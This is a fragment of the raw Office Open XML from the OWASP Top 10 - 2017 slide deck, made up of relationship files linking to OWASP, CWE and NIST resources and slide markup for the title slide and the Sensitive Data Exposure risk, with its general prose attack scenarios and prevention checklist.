Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/OWASP/Top10/issues" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout3.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag2.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_SAMM_Project" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide1.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide25.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:OWASP_Application_Security_Verification_Standard_Project" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.autodesk.com/" TargetMode="External"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide4.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide18.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/ASVS" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide3.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Testing_Project" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Proactive_Controls" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout3.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag3.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Cheat_Sheet_Series" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide21.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Guide_Project" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide25.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide20.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide1.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide19.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_SAMM_Project" TargetMode="Externa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hyperlink" Target="https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout3.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag4.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide12.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Source_Code_Analysis_Tools" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide1.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide6.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/Command_Injection" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.asd.gov.au/infosec/mitigationstrategies.htm" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide5.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/22.html" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.nist.gov/cyberframework" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout3.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag5.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide1.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.iso.org/isoiec-27001-information-security.html" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Risk_Rating_Methodology" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.microsoft.com/en-us/download/details.aspx?id=49168" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.iso.org/iso-31000-risk-management.html" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Top_10" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Threat_Risk_Modeling" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator"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hyperlink" Target="https://www.owasp.org/index.php/ASVS_V5_Input_validation_and_output_encoding" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/77.html" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide7.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/917.html" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Proactive_Controls#2:_Parameterize_Queries" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Injection_Prevention_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/Command_Injection" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout4.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Automated_Threats_to_Web_Applications" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/564.html" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag6.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/Top_10_2007-Insecure_Cryptographic_Storage" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Testing_for_ORM_Injection_(OTG-INPVAL-007)" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Injection_Flaws" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:Vulnerability_Scanning_Tools" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Query_Parameterization_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="(https:/portswigger.net/kb/issues/00101080_serversidetemplateinjection)" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Testing_for_Command_Injection_(OTG-INPVAL-013)" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/89.html" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Source_Code_Analysis_Tools" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Testing_for_SQL_Injection_(OTG-INPVAL-005)" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Injection_Prevention_Cheat_Sheet_in_Java" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/kb/issues/00101080_serversidetemplateinjection"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160;Authentication" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Credential_Stuffing_Prevention_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pages.nist.gov/800-63-3/sp800-63b.html#memsecret" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide8.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/danielmiessler/SecLists/tree/master/Passwords" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Proactive_Controls#5:_Implement_Identity_and_Authentication_Controls" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Authentication_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/Command_Injection" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout4.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Session_Management_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/384.html" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag7.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide10.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Testing_for_authentication" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/danielmiessler/SecLists" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Automated_Threats_to_Web_Applications" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Testing_Identity_Management" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/287.html" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Credential_stuffing" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:OWASP_Application_Security_Verification_Standard_Project#tab=Home" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Forgot_Password_Cheat_Shee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6858000" cy="4267200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="83276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Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="3201130"/>
            <a:ext cx="5562600" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="15875">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:ln w="24500" cmpd="dbl">
                  <a:noFill/>
                  <a:prstDash val="solid"/>
                  <a:miter lim="800000"/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Release</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" b="1" dirty="0">
              <a:ln w="24500" cmpd="dbl">
                <a:noFill/>
                <a:prstDash val="solid"/>
                <a:miter lim="800000"/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7" descr="OWASP_logo.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="381000"/>
            <a:ext cx="3260464" cy="998800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8" descr="cc.logo.large.png">
            <a:hlinkClick r:id="rId3"/>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5094000" y="8532000"/>
            <a:ext cx="1081144" cy="257976"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="1828800"/>
            <a:ext cx="6019800" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>OWASP Top 10 - 2017</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>The Ten Most Critical Web Application Security Risks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="TextBox 12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1935032" y="8636913"/>
            <a:ext cx="4389568" cy="430887"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>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This work is licensed under a </a:t>
            </a:r>
            <a:b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br>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Creative Commons Attribution-ShareAlike 4.0 International License</a:t>
            </a:r>
            <a:endPar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p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Grafik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0600" y="4572000"/>
            <a:ext cx="4876397" cy="3248899"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="8758980"/>
            <a:ext cx="1630232" cy="261610"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>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https://owasp.org</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2323774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An application encrypts credit card numbers in a database using automatic database encryption. However, this data is automatically decrypted when retrieved, allowing an SQL injection flaw to retrieve credit card numbers in clear text. </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 site doesn't use or enforce TLS for all pages or supports weak encryption. An attacker monitors network traffic  (e.g. at an insecure wireless network), downgrades connections from HTTPS to HTTP, intercepts requests, and steals the user's session cookie. The attacker then replays this cookie and hijacks the user's (authenticated) session, accessing or modifying the user's private data. Instead of the above they could alter all transported data, e.g. the recipient of a money transfer.</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#3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: The password database uses unsalted or simple hashes to store everyone's passwords. A file upload flaw allows an attacker to retrieve the password database. All the unsalted hashes can be exposed with a rainbow table of pre-calculated hashes. Hashes generated by simple or fast hash functions may be cracked by GPUs, even if they were salted.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRP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The first thing is to determine the protection needs of data in transit and at rest. For example, passwords, credit card numbers, health records, personal information and business secrets require extra protection, particularly if that data falls under privacy laws, e.g. EU's General Data Protection Regulation (GDPR), or regulations, e.g. financial data protection such as PCI Data Security Standard (PCI DSS). For all such data:</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Is any data transmitted in clear text? This concerns protocols such as HTTP, SMTP, and FTP. External internet traffic is especially </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="90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dangerous. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="9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Verify</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"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all internal traffic e.g. between load balancers, web servers, or back-end systems</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="90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Is sensitive data stored in clear text, including backups?</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Are any old or weak cryptographic algorithms used either by default or in older code? </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Are default crypto keys in use, weak crypto keys generated or re-used, or is proper key management or rotation missing?</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Is encryption not enforced, e.g. are any user agent (browser) security directives or headers missing?</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Does the user agent (e.g. app, mail client) not verify if the received server certificate is valid?</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See ASVS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>Crypto (V7)</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5"/>
              </a:rPr>
              <a:t>Data Prot (V9)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>SSL/TLS (V10)</a:t>
            </a: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de-DE" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:hlinkClick r:id="rId7"/>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8"/>
              </a:rPr>
              <a:t>OWASP Proactive Controls: Protect Data</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OWASP Application Security Verification Standard (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>V7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>9</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>10</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE"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9"/>
              </a:rPr>
              <a:t>OWASP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId10"/>
              </a:rPr>
              <a:t>Cheat Sheet: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>Transport Layer Protection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0"/>
              </a:rPr>
              <a:t>OWASP Cheat Sheet: User Privacy Protection</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1"/>
              </a:rPr>
              <a:t>OWASP Cheat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId11"/>
              </a:rPr>
              <a:t>Sheets</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId11"/>
              </a:rPr>
              <a:t>: Password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
